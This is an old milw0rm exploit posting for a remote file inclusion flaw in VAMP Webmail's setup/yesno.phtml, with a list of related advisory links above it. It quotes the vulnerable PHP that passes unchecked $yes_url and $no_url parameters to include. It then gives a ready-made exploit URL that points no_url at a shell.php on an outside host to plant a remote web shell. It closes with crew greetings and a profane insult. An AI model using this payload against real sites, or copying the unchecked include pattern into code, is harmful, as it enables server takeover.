Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

Kerio Multiple insufficient argument validation of hooked SSDT function Vulnerability

EasyBannerFree (functions. php) Remote File Include Exploit

[SA22211] WWWthreads "Cat" Cross-Site Scripting Vulnerabilities

[SA22176] DeluxeBB "templatefolder" File Inclusion Vulnerability

From:	MILW0RM <submit_(at)_milw0rm.com>
Date:	02.10.2006
Subject:	VAMP Webmail <= 2.0beta1 (yesno.phtml) Remote Include Vulnerability

###### ToXiC #########################
#
#VAMP Webmail Remote File Inclusion by ToXiC CreW
#
#BuG FounD by Drago84
#
#Application Affect:VAMP Webmail
#
#Page:
#     yesno.phtml
#Dir :
#     /setup/
#
#Problem:
#        <?if($answer=="Yes") {
#         include $yes_url;
#         } else {
#        include $no_url;
#         }?>
# ExPloit :
#http://www.site.com/wamp_dir/setup/yesno.phtml?no_url=http://sonic-banda-di-
lamer.gay/shell.php?
#
#        
GrEatZ All Member of ToXiC, Str0ke
#
#
#FUCK #Sonic
#
# ToXic Security Italian CreW
###### ToXiC ##########

# milw0rm.com [2006-09-30]